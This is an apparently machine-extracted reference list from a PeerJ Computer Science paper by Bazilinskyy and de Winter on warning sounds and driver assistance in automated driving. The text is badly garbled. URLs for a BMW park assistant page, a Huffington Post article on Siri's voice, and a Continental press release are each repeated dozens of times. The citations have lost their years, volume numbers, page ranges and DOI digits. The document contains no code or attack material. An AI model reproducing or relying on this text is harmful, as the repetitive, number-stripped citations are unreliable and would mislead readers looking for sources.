/showroom/driver_assistance/park_assistant.html#t=l http://www.bmw.com/com/en/newvehicles/x/x / /showroom/driver_assistance/park_assistant.html#t=l http://www.bmw.com/com/en/newvehicles/x/x / /showroom/driver_assistance/park_assistant.html#t=l http://www.bmw.com/com/en/newvehicles/x/x / /showroom/driver_assistance/park_assistant.html#t=l http://www.bmw.com/com/en/newvehicles/x/x / /showroom/driver_assistance/park_assistant.html#t=l http://www.bmw.com/com/en/newvehicles/x/x / /showroom/driver_assistance/park_assistant.html#t=l http://www.bmw.com/com/en/newvehicles/x/x / /showroom/driver_assistance/park_assistant.html#t=l http://www.bmw.com/com/en/newvehicles/x/x / /showroom/driver_assistance/park_assistant.html#t=l http://www.bmw.com/com/en/newvehicles/x/x / /showroom/driver_assistance/park_assistant.html#t=l http://www.bmw.com/com/en/newvehicles/x/x / /showroom/driver_assistance/park_assistant.html#t=l http://www.bmw.com/com/en/newvehicles/x/x / /showroom/driver_assistance/park_assistant.html#t=l http://www.bmw.com/com/en/newvehicles/x/x / /showroom/driver_assistance/park_assistant.html#t=l http://www.bmw.com/com/en/newvehicles/x/x / /showroom/driver_assistance/park_assistant.html#t=l http://www.bmw.com/com/en/newvehicles/x/x / /showroom/driver_assistance/park_assistant.html#t=l http://www.bmw.com/com/en/newvehicles/x/x / /showroom/driver_assistance/park_assistant.html#t=l http://www.bmw.com/com/en/newvehicles/x/x / /showroom/driver_assistance/park_assistant.html#t=l http://www.bmw.com/com/en/newvehicles/x/x / /showroom/driver_assistance/park_assistant.html#t=l http://www.bmw.com/com/en/newvehicles/x/x / /showroom/driver_assistance/park_assistant.html#t=l http://www.bmw.com/com/en/newvehicles/x/x / /showroom/driver_assistance/park_assistant.html#t=l http://www.bmw.com/com/en/newvehicles/x/x / /showroom/driver_assistance/park_assistant.html#t=l http://www.bmw.com/com/en/newvehicles/x/x / /showroom/driver_assistance/park_assistant.html#t=l http://www.bmw.com/com/en/newvehicles/x/x / /showroom/driver_assistance/park_assistant.html#t=l http://www.bmw.com/com/en/newvehicles/x/x / /showroom/driver_assistance/park_assistant.html#t=l http://www.bmw.com/com/en/newvehicles/x/x / /showroom/driver_assistance/park_assistant.html#t=l http://www.bmw.com/com/en/newvehicles/x/x / /showroom/driver_assistance/park_assistant.html#t=l http://www.bmw.com/com/en/newvehicles/x/x / /showroom/driver_assistance/park_assistant.html#t=l http://www.bmw.com/com/en/newvehicles/x/x / /showroom/driver_assistance/park_assistant.html#t=l http://www.bmw.com/com/en/newvehicles/x/x / /showroom/driver_assistance/park_assistant.html#t=l http://www.bmw.com/com/en/newvehicles/x/x / /showroom/driver_assistance/park_assistant.html#t=l http://www.bmw.com/com/en/newvehicles/x/x / /showroom/driver_assistance/park_assistant.html#t=l http://www.bmw.com/com/en/newvehicles/x/x / /showroom/driver_assistance/park_assistant.html#t=l http://www.bmw.com/com/en/newvehicles/x/x / /showroom/driver_assistance/park_assistant.html#t=l http://www.bmw.com/com/en/newvehicles/x/x / /showroom/driver_assistance/park_assistant.html#t=l http://www.bmw.com/com/en/newvehicles/x/x / /showroom/driver_assistance/park_assistant.html#t=l http://www.bmw.com/com/en/newvehicles/x/x / /showroom/driver_assistance/park_assistant.html#t=l http://www.bmw.com/com/en/newvehicles/x/x / /showroom/driver_assistance/park_assistant.html#t=l http://www.bmw.com/com/en/newvehicles/x/x / /showroom/driver_assistance/park_assistant.html#t=l http://www.bmw.com/com/en/newvehicles/x/x / /showroom/driver_assistance/park_assistant.html#t=l http://www.bmw.com/com/en/newvehicles/x/x / /showroom/driver_assistance/park_assistant.html#t=l http://www.bmw.com/com/en/newvehicles/x/x / /showroom/driver_assistance/park_assistant.html#t=l http://www.bmw.com/com/en/newvehicles/x/x / /showroom/driver_assistance/park_assistant.html#t=l http://www.bmw.com/com/en/newvehicles/x/x / /showroom/driver_assistance/park_assistant.html#t=l http://www.bmw.com/com/en/newvehicles/x/x / /showroom/driver_assistance/park_assistant.html#t=l http://www.bmw.com/com/en/newvehicles/x/x / /showroom/driver_assistance/park_assistant.html#t=l http://www.bmw.com/com/en/newvehicles/x/x / /showroom/driver_assistance/park_assistant.html#t=l http://www.bmw.com/com/en/newvehicles/x/x / /showroom/driver_assistance/park_assistant.html#t=l http://www.bmw.com/com/en/newvehicles/x/x / /showroom/driver_assistance/park_assistant.html#t=l http://www.bmw.com/com/en/newvehicles/x/x / /showroom/driver_assistance/park_assistant.html#t=l http://www.bmw.com/com/en/newvehicles/x/x / /showroom/driver_assistance/park_assistant.html#t=l http://www.bmw.com/com/en/newvehicles/x/x / /showroom/driver_assistance/park_assistant.html#t=l http://www.bmw.com/com/en/newvehicles/x/x / /showroom/driver_assistance/park_assistant.html#t=l http://www.bmw.com/com/en/newvehicles/x/x / /showroom/driver_assistance/park_assistant.html#t=l http://www.bmw.com/com/en/newvehicles/x/x / /showroom/driver_assistance/park_assistant.html#t=l http://www.bmw.com/com/en/newvehicles/x/x / /showroom/driver_assistance/park_assistant.html#t=l http://www.bmw.com/com/en/newvehicles/x/x / /showroom/driver_assistance/park_assistant.html#t=l http://www.bmw.com/com/en/newvehicles/x/x / /showroom/driver_assistance/park_assistant.html#t=l http://www.bmw.com/com/en/newvehicles/x/x / /showroom/driver_assistance/park_assistant.html#t=l http://www.bmw.com/com/en/newvehicles/x/x / /showroom/driver_assistance/park_assistant.html#t=l http://www.bmw.com/com/en/newvehicles/x/x / /showroom/driver_assistance/park_assistant.html#t=l http://www.bmw.com/com/en/newvehicles/x/x / /showroom/driver_assistance/park_assistant.html#t=l http://www.bmw.com/com/en/newvehicles/x/x / /showroom/driver_assistance/park_assistant.html#t=l http://www.bmw.com/com/en/newvehicles/x/x / /showroom/driver_assistance/park_assistant.html#t=l http://www.bmw.com/com/en/newvehicles/x/x / /showroom/driver_assistance/park_assistant.html#t=l http://www.bmw.com/com/en/newvehicles/x/x / /showroom/driver_assistance/park_assistant.html#t=l http://www.bmw.com/com/en/newvehicles/x/x / /showroom/driver_assistance/park_assistant.html#t=l http://www.bmw.com/com/en/newvehicles/x/x / /showroom/driver_assistance/park_assistant.html#t=l http://www.bmw.com/com/en/newvehicles/x/x / /showroom/driver_assistance/park_assistant.html#t=l http://www.bmw.com/com/en/newvehicles/x/x / /showroom/driver_assistance/park_assistant.html#t=l http://www.bmw.com/com/en/newvehicles/x/x / /showroom/driver_assistance/park_assistant.html#t=l http://www.bmw.com/com/en/newvehicles/x/x / /showroom/driver_assistance/park_assistant.html#t=l http://www.bmw.com/com/en/newvehicles/x/x / /showroom/driver_assistance/park_assistant.html#t=l http://www.bmw.com/com/en/newvehicles/x/x / /showroom/driver_assistance/park_assistant.html#t=l http://www.bmw.com/com/en/newvehicles/x/x / /showroom/driver_assistance/park_assistant.html#t=l http://www.bmw.com/com/en/newvehicles/x/x / /showroom/driver_assistance/park_assistant.html#t=l http://www.bmw.com/com/en/newvehicles/x/x / /showroom/driver_assistance/park_assistant.html#t=l http://www.bmw.com/com/en/newvehicles/x/x / /showroom/driver_assistance/park_assistant.html#t=l http://www.bmw.com/com/en/newvehicles/x/x / /showroom/driver_assistance/park_assistant.html#t=l http://www.huffingtonpost.com/ / / /siri-voice-man-woman_n_ .html http://www.huffingtonpost.com/ / / /siri-voice-man-woman_n_ .html http://www.huffingtonpost.com/ / / /siri-voice-man-woman_n_ .html http://www.huffingtonpost.com/ / / /siri-voice-man-woman_n_ .html http://www.huffingtonpost.com/ / / /siri-voice-man-woman_n_ .html http://www.huffingtonpost.com/ / / /siri-voice-man-woman_n_ .html http://www.huffingtonpost.com/ / / /siri-voice-man-woman_n_ .html http://www.huffingtonpost.com/ / / /siri-voice-man-woman_n_ .html http://www.huffingtonpost.com/ / / /siri-voice-man-woman_n_ .html http://www.huffingtonpost.com/ / / /siri-voice-man-woman_n_ .html http://www.huffingtonpost.com/ / / /siri-voice-man-woman_n_ .html http://www.huffingtonpost.com/ / / /siri-voice-man-woman_n_ .html http://www.huffingtonpost.com/ / / /siri-voice-man-woman_n_ .html http://www.huffingtonpost.com/ / / /siri-voice-man-woman_n_ .html http://www.huffingtonpost.com/ / / /siri-voice-man-woman_n_ .html http://www.huffingtonpost.com/ / / /siri-voice-man-woman_n_ .html http://www.huffingtonpost.com/ / / /siri-voice-man-woman_n_ .html http://www.huffingtonpost.com/ / / /siri-voice-man-woman_n_ .html http://www.huffingtonpost.com/ / / /siri-voice-man-woman_n_ .html http://www.huffingtonpost.com/ / / /siri-voice-man-woman_n_ .html http://www.huffingtonpost.com/ / / /siri-voice-man-woman_n_ .html http://www.huffingtonpost.com/ / / /siri-voice-man-woman_n_ .html http://www.huffingtonpost.com/ / / /siri-voice-man-woman_n_ .html http://www.huffingtonpost.com/ / / /siri-voice-man-woman_n_ .html http://www.huffingtonpost.com/ / / /siri-voice-man-woman_n_ .html http://www.huffingtonpost.com/ / / /siri-voice-man-woman_n_ .html http://www.huffingtonpost.com/ / / /siri-voice-man-woman_n_ .html http://www.huffingtonpost.com/ / / /siri-voice-man-woman_n_ .html http://www.huffingtonpost.com/ / / /siri-voice-man-woman_n_ .html http://www.huffingtonpost.com/ / / /siri-voice-man-woman_n_ .html http://www.huffingtonpost.com/ / / /siri-voice-man-woman_n_ .html http://www.huffingtonpost.com/ / / /siri-voice-man-woman_n_ .html http://www.huffingtonpost.com/ / / /siri-voice-man-woman_n_ .html http://www.huffingtonpost.com/ / / /siri-voice-man-woman_n_ .html http://www.huffingtonpost.com/ / / /siri-voice-man-woman_n_ .html http://www.huffingtonpost.com/ / / /siri-voice-man-woman_n_ .html http://www.huffingtonpost.com/ / / /siri-voice-man-woman_n_ .html http://www.huffingtonpost.com/ / / /siri-voice-man-woman_n_ .html http://www.huffingtonpost.com/ / / /siri-voice-man-woman_n_ .html http://www.huffingtonpost.com/ / / /siri-voice-man-woman_n_ .html http://www.huffingtonpost.com/ / / /siri-voice-man-woman_n_ .html http://www.huffingtonpost.com/ / / /siri-voice-man-woman_n_ .html http://www.huffingtonpost.com/ / / /siri-voice-man-woman_n_ .html http://www.huffingtonpost.com/ / / /siri-voice-man-woman_n_ .html http://www.huffingtonpost.com/ / / /siri-voice-man-woman_n_ .html http://www.huffingtonpost.com/ / / /siri-voice-man-woman_n_ .html http://www.huffingtonpost.com/ / / /siri-voice-man-woman_n_ .html http://www.huffingtonpost.com/ / / /siri-voice-man-woman_n_ .html http://www.huffingtonpost.com/ / / /siri-voice-man-woman_n_ .html http://www.huffingtonpost.com/ / / /siri-voice-man-woman_n_ .html http://www.huffingtonpost.com/ / / /siri-voice-man-woman_n_ .html http://www.huffingtonpost.com/ / / /siri-voice-man-woman_n_ .html http://www.huffingtonpost.com/ / / /siri-voice-man-woman_n_ .html http://www.huffingtonpost.com/ / / /siri-voice-man-woman_n_ .html http://www.huffingtonpost.com/ / / /siri-voice-man-woman_n_ .html http://www.huffingtonpost.com/ / / /siri-voice-man-woman_n_ .html http://www.huffingtonpost.com/ / / /siri-voice-man-woman_n_ .html http://www.huffingtonpost.com/ / / /siri-voice-man-woman_n_ .html http://www.huffingtonpost.com/ / / /siri-voice-man-woman_n_ .html http://www.huffingtonpost.com/ / / /siri-voice-man-woman_n_ .html http://www.huffingtonpost.com/ / / /siri-voice-man-woman_n_ .html http://www.huffingtonpost.com/ / / /siri-voice-man-woman_n_ .html http://www.huffingtonpost.com/ / / /siri-voice-man-woman_n_ .html http://www.huffingtonpost.com/ / / /siri-voice-man-woman_n_ .html http://www.huffingtonpost.com/ / / /siri-voice-man-woman_n_ .html http://www.huffingtonpost.com/ / / /siri-voice-man-woman_n_ .html http://www.huffingtonpost.com/ / / /siri-voice-man-woman_n_ .html http://www.huffingtonpost.com/ / / /siri-voice-man-woman_n_ .html http://www.huffingtonpost.com/ / / /siri-voice-man-woman_n_ .html http://www.huffingtonpost.com/ / / /siri-voice-man-woman_n_ .html http://www.huffingtonpost.com/ / / /siri-voice-man-woman_n_ .html http://www.huffingtonpost.com/ / / /siri-voice-man-woman_n_ .html http://www.huffingtonpost.com/ / / /siri-voice-man-woman_n_ .html http://www.huffingtonpost.com/ / / /siri-voice-man-woman_n_ .html http://www.huffingtonpost.com/ / / /siri-voice-man-woman_n_ .html http://www.huffingtonpost.com/ / / /siri-voice-man-woman_n_ .html http://dx.doi.org/ . / http://dx.doi.org/ . / http://dx.doi.org/ . /j.aap. . . http://dx.doi.org/ . /peerj-cs. continental. . continental strategy focuses on automated driving. available at https://www. conti-online.com/www/pressportal com en/themes/press releases/ topics/automated driving en/ pr automated driving en.html (accessed november ). cooke m, ellis dpw. . the auditory organization of speech and other sources in listeners and computational models. speech communication : – doi . /s - ( ) - . crump mjc, mcdonnell jv, gureckis tm. . evaluating amazon’s mechanical turk as a tool for experimental behavioral research. plos one :e doi . /journal.pone. . dagan e, mano o, stein gp, shashua a. . forward collision warning with a single camera. in: ieee intelligent vehicles symposium, , parma, italy. – . daimler. . distronic plus: warns and assists the driver. available at http://www.daimler. com/dccom/ - - - - - - - - - - - - - - - - - - - .html (accessed november ). de winter jcf. . predicting self-reported violations among novice license drivers using pre-license simulator measures. accident analysis & prevention : – doi . /j.aap. . . . de winter jcf, happee r, martens mh, stanton na. . effects of adaptive cruise control and highly automated driving on workload and situation awareness: a review of the empirical evidence. transportation research part f: traffic psychology and behaviour : – doi . /j.trf. . . . de winter jcf, kyriakidis m, dodou d, happee r. . using crowdflower to study the relationship between self-reported violations and traffic accidents. in: proceedings of the th international conference on applied human factors and ergonomics (ahfe), las vegas, nv. doi . /j.promfg. . . . desmond p, hancock p, monette j. . fatigue and automation-induced impairments in simulated driving performance. transportation research record: journal of the transportation research board : – doi . / - . dingus ta, hulse mc, barfield w. . human–system interface issues in the design and use of advanced traveler information systems. in: barfield w, dingus ta, eds. human factors in intelligent transportation systems. mahwah, nj: lawrence erlbaum associates, – . dobler d, haller m, stampfl p. . asr—augmented sound reality [abstract]. in: siggraph’ conference abstracts and applications. new york: acm press, . ebbatson m. . the loss of manual flying skills in pilots of highly automated airliners. phd thesis, cranfield university. edworthy j, hellier e, rivers j. . the use of male or female voices in warnings systems: a question of acoustics. noise & health : – . european commision. . roadmap to a single european transport area—towards a competitive and resource efficient transport system (white paper, com( ) final) brussels. ford. . collision warning with brake support. available at http://support.ford.com/ maintenance/collision-warning-brake-support (accessed january ). garas j. . adaptive d sound systems. kluwer academic publishers. doi . / - - - - . bazilinskyy and de winter ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ https://www.conti-online.com/www/pressportal_com_en/themes/press_releases/ _topics/automated_driving_en/pr_ _ _ _automated_driving_en.html https://www.conti-online.com/www/pressportal_com_en/themes/press_releases/ _topics/automated_driving_en/pr_ _ _ _automated_driving_en.html https://www.conti-online.com/www/pressportal_com_en/themes/press_releases/ _topics/automated_driving_en/pr_ _ _ _automated_driving_en.html https://www.conti-online.com/www/pressportal_com_en/themes/press_releases/ _topics/automated_driving_en/pr_ _ _ _automated_driving_en.html https://www.conti-online.com/www/pressportal_com_en/themes/press_releases/ _topics/automated_driving_en/pr_ _ _ _automated_driving_en.html https://www.conti-online.com/www/pressportal_com_en/themes/press_releases/ _topics/automated_driving_en/pr_ _ _ _automated_driving_en.html https://www.conti-online.com/www/pressportal_com_en/themes/press_releases/ _topics/automated_driving_en/pr_ _ _ _automated_driving_en.html https://www.conti-online.com/www/pressportal_com_en/themes/press_releases/ _topics/automated_driving_en/pr_ _ _ _automated_driving_en.html https://www.conti-online.com/www/pressportal_com_en/themes/press_releases/ _topics/automated_driving_en/pr_ _ _ _automated_driving_en.html https://www.conti-online.com/www/pressportal_com_en/themes/press_releases/ _topics/automated_driving_en/pr_ _ _ _automated_driving_en.html https://www.conti-online.com/www/pressportal_com_en/themes/press_releases/ _topics/automated_driving_en/pr_ _ _ _automated_driving_en.html https://www.conti-online.com/www/pressportal_com_en/themes/press_releases/ _topics/automated_driving_en/pr_ _ _ _automated_driving_en.html https://www.conti-online.com/www/pressportal_com_en/themes/press_releases/ _topics/automated_driving_en/pr_ _ _ _automated_driving_en.html https://www.conti-online.com/www/pressportal_com_en/themes/press_releases/ _topics/automated_driving_en/pr_ _ _ _automated_driving_en.html https://www.conti-online.com/www/pressportal_com_en/themes/press_releases/ _topics/automated_driving_en/pr_ _ _ _automated_driving_en.html https://www.conti-online.com/www/pressportal_com_en/themes/press_releases/ _topics/automated_driving_en/pr_ _ _ _automated_driving_en.html https://www.conti-online.com/www/pressportal_com_en/themes/press_releases/ _topics/automated_driving_en/pr_ _ _ _automated_driving_en.html https://www.conti-online.com/www/pressportal_com_en/themes/press_releases/ _topics/automated_driving_en/pr_ _ _ _automated_driving_en.html https://www.conti-online.com/www/pressportal_com_en/themes/press_releases/ _topics/automated_driving_en/pr_ _ _ _automated_driving_en.html https://www.conti-online.com/www/pressportal_com_en/themes/press_releases/ _topics/automated_driving_en/pr_ _ _ _automated_driving_en.html https://www.conti-online.com/www/pressportal_com_en/themes/press_releases/ _topics/automated_driving_en/pr_ _ _ _automated_driving_en.html https://www.conti-online.com/www/pressportal_com_en/themes/press_releases/ _topics/automated_driving_en/pr_ _ _ _automated_driving_en.html https://www.conti-online.com/www/pressportal_com_en/themes/press_releases/ _topics/automated_driving_en/pr_ _ _ _automated_driving_en.html https://www.conti-online.com/www/pressportal_com_en/themes/press_releases/ _topics/automated_driving_en/pr_ _ _ _automated_driving_en.html https://www.conti-online.com/www/pressportal_com_en/themes/press_releases/ _topics/automated_driving_en/pr_ _ _ _automated_driving_en.html https://www.conti-online.com/www/pressportal_com_en/themes/press_releases/ _topics/automated_driving_en/pr_ _ _ _automated_driving_en.html https://www.conti-online.com/www/pressportal_com_en/themes/press_releases/ _topics/automated_driving_en/pr_ _ _ _automated_driving_en.html https://www.conti-online.com/www/pressportal_com_en/themes/press_releases/ _topics/automated_driving_en/pr_ _ _ _automated_driving_en.html https://www.conti-online.com/www/pressportal_com_en/themes/press_releases/ _topics/automated_driving_en/pr_ _ _ _automated_driving_en.html https://www.conti-online.com/www/pressportal_com_en/themes/press_releases/ _topics/automated_driving_en/pr_ _ _ _automated_driving_en.html https://www.conti-online.com/www/pressportal_com_en/themes/press_releases/ _topics/automated_driving_en/pr_ _ _ _automated_driving_en.html https://www.conti-online.com/www/pressportal_com_en/themes/press_releases/ _topics/automated_driving_en/pr_ _ _ _automated_driving_en.html https://www.conti-online.com/www/pressportal_com_en/themes/press_releases/ _topics/automated_driving_en/pr_ _ _ _automated_driving_en.html https://www.conti-online.com/www/pressportal_com_en/themes/press_releases/ _topics/automated_driving_en/pr_ _ _ _automated_driving_en.html https://www.conti-online.com/www/pressportal_com_en/themes/press_releases/ _topics/automated_driving_en/pr_ _ _ _automated_driving_en.html https://www.conti-online.com/www/pressportal_com_en/themes/press_releases/ _topics/automated_driving_en/pr_ _ _ _automated_driving_en.html https://www.conti-online.com/www/pressportal_com_en/themes/press_releases/ _topics/automated_driving_en/pr_ _ _ _automated_driving_en.html https://www.conti-online.com/www/pressportal_com_en/themes/press_releases/ _topics/automated_driving_en/pr_ _ _ _automated_driving_en.html https://www.conti-online.com/www/pressportal_com_en/themes/press_releases/ _topics/automated_driving_en/pr_ _ _ _automated_driving_en.html https://www.conti-online.com/www/pressportal_com_en/themes/press_releases/ _topics/automated_driving_en/pr_ _ _ _automated_driving_en.html https://www.conti-online.com/www/pressportal_com_en/themes/press_releases/ _topics/automated_driving_en/pr_ _ _ _automated_driving_en.html https://www.conti-online.com/www/pressportal_com_en/themes/press_releases/ _topics/automated_driving_en/pr_ _ _ _automated_driving_en.html https://www.conti-online.com/www/pressportal_com_en/themes/press_releases/ _topics/automated_driving_en/pr_ _ _ _automated_driving_en.html https://www.conti-online.com/www/pressportal_com_en/themes/press_releases/ _topics/automated_driving_en/pr_ _ _ _automated_driving_en.html https://www.conti-online.com/www/pressportal_com_en/themes/press_releases/ _topics/automated_driving_en/pr_ _ _ _automated_driving_en.html https://www.conti-online.com/www/pressportal_com_en/themes/press_releases/ _topics/automated_driving_en/pr_ _ _ _automated_driving_en.html https://www.conti-online.com/www/pressportal_com_en/themes/press_releases/ _topics/automated_driving_en/pr_ _ _ _automated_driving_en.html https://www.conti-online.com/www/pressportal_com_en/themes/press_releases/ _topics/automated_driving_en/pr_ _ _ _automated_driving_en.html https://www.conti-online.com/www/pressportal_com_en/themes/press_releases/ _topics/automated_driving_en/pr_ _ _ _automated_driving_en.html https://www.conti-online.com/www/pressportal_com_en/themes/press_releases/ _topics/automated_driving_en/pr_ _ _ _automated_driving_en.html https://www.conti-online.com/www/pressportal_com_en/themes/press_releases/ _topics/automated_driving_en/pr_ _ _ _automated_driving_en.html https://www.conti-online.com/www/pressportal_com_en/themes/press_releases/ _topics/automated_driving_en/pr_ _ _ _automated_driving_en.html https://www.conti-online.com/www/pressportal_com_en/themes/press_releases/ _topics/automated_driving_en/pr_ _ _ _automated_driving_en.html https://www.conti-online.com/www/pressportal_com_en/themes/press_releases/ _topics/automated_driving_en/pr_ _ _ _automated_driving_en.html https://www.conti-online.com/www/pressportal_com_en/themes/press_releases/ _topics/automated_driving_en/pr_ _ _ _automated_driving_en.html https://www.conti-online.com/www/pressportal_com_en/themes/press_releases/ _topics/automated_driving_en/pr_ _ _ _automated_driving_en.html https://www.conti-online.com/www/pressportal_com_en/themes/press_releases/ _topics/automated_driving_en/pr_ _ _ _automated_driving_en.html https://www.conti-online.com/www/pressportal_com_en/themes/press_releases/ _topics/automated_driving_en/pr_ _ _ _automated_driving_en.html https://www.conti-online.com/www/pressportal_com_en/themes/press_releases/ _topics/automated_driving_en/pr_ _ _ _automated_driving_en.html https://www.conti-online.com/www/pressportal_com_en/themes/press_releases/ _topics/automated_driving_en/pr_ _ _ _automated_driving_en.html https://www.conti-online.com/www/pressportal_com_en/themes/press_releases/ _topics/automated_driving_en/pr_ _ _ _automated_driving_en.html https://www.conti-online.com/www/pressportal_com_en/themes/press_releases/ _topics/automated_driving_en/pr_ _ _ _automated_driving_en.html https://www.conti-online.com/www/pressportal_com_en/themes/press_releases/ _topics/automated_driving_en/pr_ _ _ _automated_driving_en.html https://www.conti-online.com/www/pressportal_com_en/themes/press_releases/ _topics/automated_driving_en/pr_ _ _ _automated_driving_en.html https://www.conti-online.com/www/pressportal_com_en/themes/press_releases/ _topics/automated_driving_en/pr_ _ _ _automated_driving_en.html https://www.conti-online.com/www/pressportal_com_en/themes/press_releases/ _topics/automated_driving_en/pr_ _ _ _automated_driving_en.html https://www.conti-online.com/www/pressportal_com_en/themes/press_releases/ _topics/automated_driving_en/pr_ _ _ _automated_driving_en.html https://www.conti-online.com/www/pressportal_com_en/themes/press_releases/ _topics/automated_driving_en/pr_ _ _ _automated_driving_en.html https://www.conti-online.com/www/pressportal_com_en/themes/press_releases/ _topics/automated_driving_en/pr_ _ _ _automated_driving_en.html https://www.conti-online.com/www/pressportal_com_en/themes/press_releases/ _topics/automated_driving_en/pr_ _ _ _automated_driving_en.html https://www.conti-online.com/www/pressportal_com_en/themes/press_releases/ _topics/automated_driving_en/pr_ _ _ _automated_driving_en.html https://www.conti-online.com/www/pressportal_com_en/themes/press_releases/ _topics/automated_driving_en/pr_ _ _ _automated_driving_en.html https://www.conti-online.com/www/pressportal_com_en/themes/press_releases/ _topics/automated_driving_en/pr_ _ _ _automated_driving_en.html https://www.conti-online.com/www/pressportal_com_en/themes/press_releases/ _topics/automated_driving_en/pr_ _ _ _automated_driving_en.html https://www.conti-online.com/www/pressportal_com_en/themes/press_releases/ _topics/automated_driving_en/pr_ _ _ _automated_driving_en.html https://www.conti-online.com/www/pressportal_com_en/themes/press_releases/ _topics/automated_driving_en/pr_ _ _ _automated_driving_en.html https://www.conti-online.com/www/pressportal_com_en/themes/press_releases/ _topics/automated_driving_en/pr_ _ _ _automated_driving_en.html https://www.conti-online.com/www/pressportal_com_en/themes/press_releases/ _topics/automated_driving_en/pr_ _ _ _automated_driving_en.html https://www.conti-online.com/www/pressportal_com_en/themes/press_releases/ _topics/automated_driving_en/pr_ _ _ _automated_driving_en.html https://www.conti-online.com/www/pressportal_com_en/themes/press_releases/ _topics/automated_driving_en/pr_ _ _ _automated_driving_en.html https://www.conti-online.com/www/pressportal_com_en/themes/press_releases/ _topics/automated_driving_en/pr_ _ _ _automated_driving_en.html https://www.conti-online.com/www/pressportal_com_en/themes/press_releases/ _topics/automated_driving_en/pr_ _ _ _automated_driving_en.html https://www.conti-online.com/www/pressportal_com_en/themes/press_releases/ _topics/automated_driving_en/pr_ _ _ _automated_driving_en.html https://www.conti-online.com/www/pressportal_com_en/themes/press_releases/ _topics/automated_driving_en/pr_ _ _ _automated_driving_en.html https://www.conti-online.com/www/pressportal_com_en/themes/press_releases/ _topics/automated_driving_en/pr_ _ _ _automated_driving_en.html https://www.conti-online.com/www/pressportal_com_en/themes/press_releases/ _topics/automated_driving_en/pr_ _ _ _automated_driving_en.html https://www.conti-online.com/www/pressportal_com_en/themes/press_releases/ _topics/automated_driving_en/pr_ _ _ _automated_driving_en.html https://www.conti-online.com/www/pressportal_com_en/themes/press_releases/ _topics/automated_driving_en/pr_ _ _ _automated_driving_en.html https://www.conti-online.com/www/pressportal_com_en/themes/press_releases/ _topics/automated_driving_en/pr_ _ _ _automated_driving_en.html https://www.conti-online.com/www/pressportal_com_en/themes/press_releases/ _topics/automated_driving_en/pr_ _ _ _automated_driving_en.html https://www.conti-online.com/www/pressportal_com_en/themes/press_releases/ _topics/automated_driving_en/pr_ _ _ _automated_driving_en.html https://www.conti-online.com/www/pressportal_com_en/themes/press_releases/ _topics/automated_driving_en/pr_ _ _ _automated_driving_en.html https://www.conti-online.com/www/pressportal_com_en/themes/press_releases/ _topics/automated_driving_en/pr_ _ _ _automated_driving_en.html https://www.conti-online.com/www/pressportal_com_en/themes/press_releases/ _topics/automated_driving_en/pr_ _ _ _automated_driving_en.html https://www.conti-online.com/www/pressportal_com_en/themes/press_releases/ _topics/automated_driving_en/pr_ _ _ _automated_driving_en.html https://www.conti-online.com/www/pressportal_com_en/themes/press_releases/ _topics/automated_driving_en/pr_ _ _ _automated_driving_en.html https://www.conti-online.com/www/pressportal_com_en/themes/press_releases/ _topics/automated_driving_en/pr_ _ _ _automated_driving_en.html https://www.conti-online.com/www/pressportal_com_en/themes/press_releases/ _topics/automated_driving_en/pr_ _ _ _automated_driving_en.html https://www.conti-online.com/www/pressportal_com_en/themes/press_releases/ _topics/automated_driving_en/pr_ _ _ _automated_driving_en.html https://www.conti-online.com/www/pressportal_com_en/themes/press_releases/ _topics/automated_driving_en/pr_ _ _ _automated_driving_en.html https://www.conti-online.com/www/pressportal_com_en/themes/press_releases/ _topics/automated_driving_en/pr_ _ _ _automated_driving_en.html https://www.conti-online.com/www/pressportal_com_en/themes/press_releases/ _topics/automated_driving_en/pr_ _ _ _automated_driving_en.html https://www.conti-online.com/www/pressportal_com_en/themes/press_releases/ _topics/automated_driving_en/pr_ _ _ _automated_driving_en.html https://www.conti-online.com/www/pressportal_com_en/themes/press_releases/ _topics/automated_driving_en/pr_ _ _ _automated_driving_en.html https://www.conti-online.com/www/pressportal_com_en/themes/press_releases/ _topics/automated_driving_en/pr_ _ _ _automated_driving_en.html https://www.conti-online.com/www/pressportal_com_en/themes/press_releases/ _topics/automated_driving_en/pr_ _ _ _automated_driving_en.html https://www.conti-online.com/www/pressportal_com_en/themes/press_releases/ _topics/automated_driving_en/pr_ _ _ _automated_driving_en.html https://www.conti-online.com/www/pressportal_com_en/themes/press_releases/ _topics/automated_driving_en/pr_ _ _ _automated_driving_en.html https://www.conti-online.com/www/pressportal_com_en/themes/press_releases/ _topics/automated_driving_en/pr_ _ _ _automated_driving_en.html https://www.conti-online.com/www/pressportal_com_en/themes/press_releases/ _topics/automated_driving_en/pr_ _ _ _automated_driving_en.html https://www.conti-online.com/www/pressportal_com_en/themes/press_releases/ _topics/automated_driving_en/pr_ _ _ _automated_driving_en.html https://www.conti-online.com/www/pressportal_com_en/themes/press_releases/ _topics/automated_driving_en/pr_ _ _ _automated_driving_en.html https://www.conti-online.com/www/pressportal_com_en/themes/press_releases/ _topics/automated_driving_en/pr_ _ _ _automated_driving_en.html https://www.conti-online.com/www/pressportal_com_en/themes/press_releases/ _topics/automated_driving_en/pr_ _ _ _automated_driving_en.html https://www.conti-online.com/www/pressportal_com_en/themes/press_releases/ _topics/automated_driving_en/pr_ _ _ _automated_driving_en.html https://www.conti-online.com/www/pressportal_com_en/themes/press_releases/ _topics/automated_driving_en/pr_ _ _ _automated_driving_en.html https://www.conti-online.com/www/pressportal_com_en/themes/press_releases/ _topics/automated_driving_en/pr_ _ _ _automated_driving_en.html https://www.conti-online.com/www/pressportal_com_en/themes/press_releases/ _topics/automated_driving_en/pr_ _ _ _automated_driving_en.html https://www.conti-online.com/www/pressportal_com_en/themes/press_releases/ _topics/automated_driving_en/pr_ _ _ _automated_driving_en.html https://www.conti-online.com/www/pressportal_com_en/themes/press_releases/ _topics/automated_driving_en/pr_ _ _ _automated_driving_en.html https://www.conti-online.com/www/pressportal_com_en/themes/press_releases/ _topics/automated_driving_en/pr_ _ _ _automated_driving_en.html https://www.conti-online.com/www/pressportal_com_en/themes/press_releases/ _topics/automated_driving_en/pr_ _ _ _automated_driving_en.html https://www.conti-online.com/www/pressportal_com_en/themes/press_releases/ _topics/automated_driving_en/pr_ _ _ _automated_driving_en.html https://www.conti-online.com/www/pressportal_com_en/themes/press_releases/ _topics/automated_driving_en/pr_ _ _ _automated_driving_en.html https://www.conti-online.com/www/pressportal_com_en/themes/press_releases/ _topics/automated_driving_en/pr_ _ _ _automated_driving_en.html https://www.conti-online.com/www/pressportal_com_en/themes/press_releases/ _topics/automated_driving_en/pr_ _ _ _automated_driving_en.html 